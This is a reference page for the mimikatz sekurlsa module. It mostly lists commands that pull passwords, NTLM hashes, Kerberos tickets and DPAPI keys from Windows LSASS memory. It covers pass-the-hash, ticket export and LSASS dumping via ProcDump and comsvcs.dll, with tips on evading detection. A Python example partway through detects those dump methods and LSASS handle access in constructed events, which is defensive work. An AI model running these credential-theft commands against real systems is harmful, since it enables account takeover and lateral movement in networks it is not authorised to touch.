sekurlsa

Extract passwords, keys, PIN codes, and Kerberos tickets from LSASS memory. Requires privilege::debug first (or SYSTEM access).

Prerequisites

mimikatz # privilege::debug
Privilege '20' OK

Without proper access: ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)


logonpasswords

Dump all cached credentials from all authentication providers (MSV, WDigest, Kerberos, TsPkg, CredMan, SSP).

mimikatz # sekurlsa::logonpasswords

Output includes:
- NTLM hashes (MSV)
- Cleartext passwords (WDigest, if enabled)
- Kerberos tickets and keys
- CredSSP credentials

Note: Windows 8+ disables WDigest cleartext caching by default. Passwords appear only when:
- Domain controller is unreachable at logon time
- HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential = 1
- CredSSP delegation is configured


pth - Pass-the-Hash

Execute a process using an NTLM hash (creates a sacrificial logon session and patches LSASS).

mimikatz # sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<nt-hash> [/aes128:<aes128-key>] [/aes256:<aes256-key>] [/run:<command>]

Options

  • /user:<username> - username to impersonate
  • /domain:<domain> - domain or machine name
  • /ntlm:<nt-hash> - NTLM/RC4 hash (mandatory for legacy)
  • /rc4:<rc4> - alias for /ntlm
  • /aes128:<aes128-key> - optional AES128 key
  • /aes256:<aes256-key> - optional AES256 key (use for stealth)
  • /run:<command> - command to execute (default: cmd.exe)

Examples

mimikatz # sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<nt-hash>
mimikatz # sekurlsa::pth /user:Administrator /domain:<domain> /ntlm:<nt-hash> /run:powershell.exe
mimikatz # sekurlsa::pth /user:<username> /domain:<domain> /aes256:<aes256-key>

Requires admin rights: opens a write handle to LSASS.


tickets

List and optionally export Kerberos tickets from all sessions.

mimikatz # sekurlsa::tickets [/export]
  • /export - save each ticket as a .kirbi file on disk

ekeys

Display all Kerberos encryption keys (AES256, AES128, RC4) for all sessions. Useful for obtaining AES keys for stealth over-pass-the-hash.

mimikatz # sekurlsa::ekeys

dpapi

Extract DPAPI master keys from LSASS session memory.

mimikatz # sekurlsa::dpapi

minidump

Redirect sekurlsa commands to work against an LSASS memory dump file instead of the live process.

mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonpasswords

Dump LSASS first (various methods):

# Task Manager: right-click lsass.exe -> Create dump file
# ProcDump:
procdump.exe -ma lsass.exe lsass.dmp
# Comsvcs.dll:
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <lsass-pid> lsass.dmp full
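
Detection-side view of the dump methods above and of the LSASS write handle noted under pth, as an added example that is not part of the original page: it labels constructed process-creation and process-access events. The event field names (kind, command_line, target_image, granted_access) are assumptions modeled on Sysmon event IDs 1 and 10.

```python
import re

# Access-mask bits from the Windows SDK (winnt.h).
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020

# Command-line shapes of the ProcDump and comsvcs.dll methods listed above.
# The comsvcs form takes a PID, so "lsass" never appears in its command line.
DUMP_PATTERNS = {
    "procdump-lsass-dump": re.compile(r'procdump(64)?(\.exe)?"?\s.*-ma\b.*\blsass', re.I),
    "comsvcs-minidump": re.compile(r'rundll32(\.exe)?"?\s.*comsvcs\.dll"?[\s,]+minidump\b', re.I),
}

def classify(event):
    """Return detection labels for one normalized event (field names are assumed)."""
    findings = []
    if event.get("kind") == "process_create":
        cmd = event.get("command_line", "")
        findings += [name for name, rx in DUMP_PATTERNS.items() if rx.search(cmd)]
    elif event.get("kind") == "process_access":
        if event.get("target_image", "").lower().endswith("\\lsass.exe"):
            mask = int(event.get("granted_access", "0x0"), 16)
            if mask & PROCESS_VM_WRITE:      # write handle, as sekurlsa::pth requires
                findings.append("lsass-write-handle")
            elif mask & PROCESS_VM_READ:     # noisy alone: allowlist known readers
                findings.append("lsass-read-handle")
    return findings

def scan(events):
    """Return (index, labels) for every event that produced at least one label."""
    return [(i, f) for i, e in enumerate(events) if (f := classify(e))]

# Constructed sample events, not captured from a real host.
SAMPLE_EVENTS = [
    {"kind": "process_create", "command_line": r"procdump.exe -ma lsass.exe lsass.dmp"},
    {"kind": "process_create", "command_line":
        r'"C:\Windows\System32\rundll32.exe" C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\Temp\out.dmp full'},
    {"kind": "process_create", "command_line": r"procdump.exe -ma notepad.exe notepad.dmp"},
    {"kind": "process_access", "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1010"},
    {"kind": "process_access", "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1038"},
    {"kind": "process_access", "target_image": r"C:\Windows\System32\svchost.exe", "granted_access": "0x1038"},
]

if __name__ == "__main__":
    for index, labels in scan(SAMPLE_EVENTS):
        print(index, labels)
```

The Task Manager method has no distinctive command line, so it surfaces only through the process-access branch.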


Credential-Specific Subcommands

mimikatz # sekurlsa::msv          # MSV1_0 (NTLM) hashes only
mimikatz # sekurlsa::wdigest      # WDigest cleartext passwords
mimikatz # sekurlsa::kerberos     # Kerberos credentials + smartcard PINs
mimikatz # sekurlsa::tspkg        # Terminal Services (CredSSP) credentials
mimikatz # sekurlsa::credman      # Windows Credential Manager entries
mimikatz # sekurlsa::ssp          # Security Support Provider credentials
mimikatz # sekurlsa::livessp      # LiveSSP credentials
mimikatz # sekurlsa::searchpasswords  # Keyword search in memory for passwords

Notes

  • Credential Guard prevents all credential extraction via sekurlsa
  • sekurlsa::ekeys returns all Kerberos key types; use AES256 over RC4 to avoid encryption downgrade detection
  • When working against a minidump, specify the dump file path with sekurlsa::minidump before running other sekurlsa commands